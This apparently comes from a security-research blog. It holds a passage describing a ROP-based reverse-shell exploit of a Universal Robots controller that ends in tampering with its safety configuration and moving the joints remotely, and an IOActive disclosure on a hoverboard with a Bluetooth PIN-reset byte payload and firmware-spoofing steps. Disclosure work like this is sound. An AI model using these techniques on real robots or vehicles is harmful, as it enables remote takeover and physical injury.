Before proceeding with the exploit, let’s review the exploit mitigations in place. The robot’s Linux kernel is configured to randomize (randomize_va_space=1 => ASLR) the positions of the stack, virtual dynamic shared object page, and shared memory regions. Moreover, this core binary does not allow any of its segments to be both writable and executable due to the “No eXecute” (NX) bit.
While overflowing the destination buffer, we also overflow pointers to the function’s arguments. Before the function returns, these arguments are used in other function calls, so we have to provide these calls with a valid value/structure. Otherwise, we will never reach the end of the function and be able to control the execution flow.
edx+0x2c is dereferenced and used as an argument for the call to 0x82e0c90. The problem appears afterwards when EBX (which is calculated from our previous controlled pointer on EDX) needs to also point to a structure where a file descriptor is obtained and is closed with “close” afterwards.
To choose a static address that might comply with these two requirements, I used the following static region, since all others change due to ASLR.
I wrote some scripts to find a suitable memory address and found 0x83aa1fc to be perfect since it suits both conditions:
●0x83aa1fc+0x2c points to valid memory -> 0x831c00a (“INT32”)
●0x83aa1fc+0x1014 contains 0 (nearly all this region is zeroed)
Now that I have met both conditions, execution can continue to the end of this function, and I get EIP control because the saved register on the stack was overflowed:
At this point, I control most of the registers, so I need to place my shellcode somewhere and redirect the execution flow there. For this, I used returned-oriented programming (ROP), the challenge will be to find enough gadgets to set everything I need for clean and reliable exploitation. Automatic ROP-chain tools did not work well for this binary, so I did it manually.
First, I focus on my ultimate goal: to execute a reverse shell that connects to my machine. One key point when building a remote ROP-based exploit in Linux are system calls. Depending on the quality of gadgets that use int instructions I find, I will be able to use primitives such as write or dup2 to reuse the socket that was already created to return a shell or other post-exploitation strategies.
In this binary, I only found one int 0x80instruction. This is used to invoke system calls in Linux on x86. Because this is a one-shot gadget, I can only perform a single system call: I will use the execve system call to execute a program. This int 0x80 instruction requires setting up a register with the system call number (EAX in this case 0xb) and then set a register (EBX) that points to a special structure. This structure contains an array of pointers, each of which points to the arguments of the command to be executed.
Because of how this vulnerability is triggered, I cannot use null bytes (0x00) on the request buffer. This is a problem because we need to send commands and arguments and also create an array of pointers that end with a null byte. To overcome this, I send a placeholder, like chunks of 0xFF bytes, and later on I replace them with 0x00at runtimewith ROP.
In pseudocode this call would be (calls a TCP Reverse Shell):
All the controlled data is in the stack, so first I will try to align the stack pointer (ESP) to my largest controlled section (STAGE 1). I divided the largest controlled sections into two stages, since they both can potentially contain many ROP gadgets.
As seen before, at this point I control EBX and EIP. Next, I have to align ESP to any of the controlled segments so I can start doing ROP.
The following gadget (ROP1 0x8220efa) is used to adjust ESP:
This way ESP = ESP + EBX – 1 (STAGE 1 address in the stack). This aligns ESP to my STAGE 1 section. EBX should decrease ESPby0x137 bytes, so I use the number 0xfffffec9 (4294966985) because when adding it to ESP, it wraps around to the desired value.
When the retn instruction of the gadget is executed, ROP gadgets at STAGE 1 start doing their magic.STAGE 1 of the exploit does the following:
Zero out theat the end of the arguments structure. This way the processor will know that EXECVE arguments are only those three pointers.
Save a pointer to our first command of cmd[] in our arguments structure.
Jump to STAGE 2, because I don’t have much space here.
STAGE 2 of the exploit does the following:
Zero out thexffxffxffxff at the end of each argument in cmd[].
Save a pointer to the 2nd and 3rd argument of cmd[] in on our arguments structure.
Prepare registers for EXECVE. As seen before, we needed
EBX=*args[]
EDX = 0
EAX=0xb
Call theint 0x80 gadget and execute the reverse shell.
Once the TCP reverse shell payload is executed, a connection is made back to my computer. Now I can execute commands and use sudo to execute commands as rootin the robot controller.
Safety settings are saved in the safety.conf file (Step 3). Universal Robots implemented a CRC (STM-32) algorithm to provide integrity to this file and save the calculated checksum on disk. This algorithm does not provide any real integrity to the settings, as it is possible to generate collisions or calculate new checksum values for new settings overriding special files on the filesystem. I reversed how this calculation is being made for each safety setting and created an algorithm that replicates it. On the video demo, I did not fake the new CRC value to remain the same (located on top-right of the screen), even though this is possible and easy (Step 4).
Before modifying any safety setting on the robot, I setup a process that automatically starts a new instance of the robot controller after 25 seconds with the new settings. This will give me enough time to download, modify, and upload a new safety setting file. The following command sets up a new URControl process. I used Python since it allows me to close all current file descriptors of the running process when forking. Remember that I am forking from the reverse shell object, so I need to create a new process that does not inherit any of the file descriptors so they are closed when the parent URControl process dies (in order to restart and apply new safety settings).
Now I have 25 seconds to download the current file, modify it, calculate new CRC, reupload it, and kill the running URControl process (which has an older safety settings config). I can programmatically use the kill command to target the current URControl instance (Step 5).
Finally, I send this command to the URControl service in order to load the new installation we uploaded. I also close any popup that might appear on the UI.
Finally, an attacker can simply call the movej function in the URControl service to move joints remotely, with a custom speed and acceleration (Step 6). This is shown at the end of the video.
Once again, I see novel and expensive technology which is vulnerable and exploitable. A very technical bug, like a buffer overflow in one of the protocols, exposed the integrity of the entire robot system to remote attacks. We reported the complete flow of vulnerabilities to the vendors back in January, and they have yet to be patched.
Multiple Critical Vulnerabilities Found in Popular Motorized Hoverboards
By
Thomas Kilbride
Not that long ago, motorized hoverboards were in the news – according to widespread reports, they had a tendency to catch on fire and even explode. Hoverboards were so dangerous that the National Association of State Fire Marshals (NASFM) issued a statement recommending consumers “look for indications of acceptance by recognized testing organizations” when purchasing the devices. Consumers were even advised to not leave them unattended due to the risk of fires. The Federal Trade Commission has since established requirements that any hoverboard imported to the US meet baseline safety requirements set by Underwriters Laboratories.
Since hoverboards were a popular item used for personal transportation, I acquired a Ninebot by Segway miniPRO hoverboard in September of 2016 for recreational use. The technology is amazing and a lot of fun, making it very easy to learn and become a relatively skilled rider.
The hoverboard is also connected and comes with a rider application that enables the owner to do some cool things, such as change the light colors, remotely control the hoverboard, and see its battery life and remaining mileage. I was naturally a little intrigued and couldn’t help but start doing some tinkering to see how fragile the firmware was. In my past experience as a security consultant, previous well-chronicled issues brought to mind that if vulnerabilities do exist, they might be exploited by an attacker to cause some serious harm.
When I started looking further, I learned that regulations now require hoverboards to meet certain mechanical and electrical specifications with the goal of preventing battery fires and various mechanical failures; however, there are currently no regulations aimed at ensuring firmware integrity and validation, even though firmware is also integral to the safety of the system.
Let’s Break a Hoverboard
Using reverse engineering and protocol analysis techniques, I was able to determine that my Ninebot by Segway miniPRO (Ninebot purchased Segway Inc. in 2015) had several critical vulnerabilities that were wirelessly exploitable. These vulnerabilities could be used by an attacker to bypass safety systems designed by Ninebot, one of the only hoverboards approved for sale in many countries.
Using protocol analysis, I determined I didn’t need to use a rider’s PIN (Personal Identification Number) to establish a connection. Even though the rider could set a PIN, the hoverboard did not actually change its default pin of “000000.” This allowed me to connect over Bluetooth while bypassing the security controls. I could also document the communications between the app and the hoverboard, since they were not encrypted.
Additionally, after attempting to apply a corrupted firmware update, I noticed that the hoverboard did not implement any integrity checks on firmware images before applying them. This means an attacker could apply any arbitrary update to the hoverboard, which would allow them to bypass safety interlocks.
Upon further investigation of the Ninebot application, I also determined that connected riders in the area were indexed using their smart phones’ GPS; therefore, each riders’ location is published and publicly available, making actual weaponization of an exploit much easier for an attacker.
To show how this works, an attacker using the Ninebot application can locate other hoverboard riders in the vicinity:
An attacker could then connect to the miniPRO using a modified version of the Nordic UART application, the reference implementation of the Bluetooth service used in the Ninebot miniPRO. This application allows anyone to connect to the Ninebot without being asked for a PIN.By sending the following payload from the Nordic application, the attacker can change the application PIN to “111111”:
unsigned char payload[13] =
{0x55, 0xAA, 0x08, 0x0A, 0x03, 0x17, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0xAD, 0xFE}; // Set The Hoverboard Pin to “111111”
Figure 1 – miniPRO PIN Theft
Using the pin “111111,” the attacker can then launch the Ninebot application and connect to the hoverboard. This would lock a normal user out of the Ninebot mobile application because a new PIN has been set.
Using DNS spoofing, an attacker can upload an arbitrary firmware image by spoofing the domain record for apptest.ninebot.cn. The mobile application downloads the image and then uploads it to the hoverboard:
In http://apptest.ninebot.cn change the /appversion/appdownload/NinebotMini/version.json file to match your new firmware version and size. The example below forces the application to update the control/mainboard firmware image (aka driver board firmware) to v1.3.3.7, which is 50212 bytes in size.
“CtrlVersionCode”:[“1337″,”50212”]
Create a matching directory and file including the malicious firmware (/appversion/appdownload/NinebotMini/v1.3.3.7/Mini_Driver_v1.3.3.7.zip) with the modified update file Mini_Driver_V1.3.3.7.bin compressed inside of the firmware update archive.
When launched, the Ninebot application checks to see if the firmware version on the hoverboard matches the one downloaded from apptest.ninebot.cn. If there is a later version available (that is, if the version in the JSON object is newer than the version currently installed), the app triggers the firmware update process.
Analysis of Findings Even though the Ninebot application prompted a user to enter a PIN when launched, it was not checked at the protocol level before allowing the user to connect. This left the Bluetooth interface exposed to an attack at a lower level. Additionally, since this device did not use standard Bluetooth PIN-based security, communications were not encrypted and could be wirelessly intercepted by an attacker.
Exposed management interfaces should not be available on a production device. An attacker may leverage an open management interface to execute privileged actions remotely. Due to the implementation in this scenario, I was able to leverage this vulnerability and perform a firmware update of the hoverboard’s control system without authentication.
Firmware integrity checks are imperative in embedded systems. Unverified or corrupted firmware images could permanently damage systems and may allow an attacker to cause unintended behavior. I was able to modify the controller firmware to remove rider detection, and may have been able to change configuration parameters in other onboard systems, such as the BMS (Battery Management System) and Bluetooth module.
Figure 2 – Unencrypted Communications between
Hoverboard and Android Application
Figure 3 – Interception of Android Application Setting PIN Code to “111111”
Mitigation As a result of the research, IOActive made the following security design and development recommendations to Ninebot that would correct these vulnerabilities:
Implement firmware integrity checking.
Use Bluetooth Pre-Shared Key authentication or PIN authentication.
Use strong encryption for wireless communications between the application and hoverboard.
Implement a “pairing mode” as the sole mode in which the hoverboard pairs over Bluetooth.
Protect rider privacy by not exposing rider location within the Ninebot mobile application.
IOActive recommends that end users stay up-to-date with the latest versions of the app from Ninebot. We also recommend that consumers avoid hoverboard models with Bluetooth and wireless capabilities.
Responsible Disclosure After completing the research, IOActive subsequently contacted and disclosed the details of the vulnerabilities identified to Ninebot. Through a series of exchanges since the initial contact, Ninebot has released a new version of the application and reported to IOActive that the critical issues have been addressed.
December 2016: IOActive conducts testing on Ninebot by Segway miniPro hoverboard.
December 24, 2016: Ioactive contacts Ninebot via a public email address to establish a line of communication.
January 4, 2017: Ninebot responds to IOActive.
January 27, 2017: IOActive discloses issues to Ninebot.
April 2017: Ninebot releases an updated application (3.20), which includes fixes that address some of IOActive’s findings.
April 17, 2017: Ninebot informs IOActive that remediation of critical issues is complete.
July 19, 2017: IOActive publishes findings.
For more information about this research, please refer to the following additional materials:
By continuing to use the site, you agree to the use of cookies. more information
The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.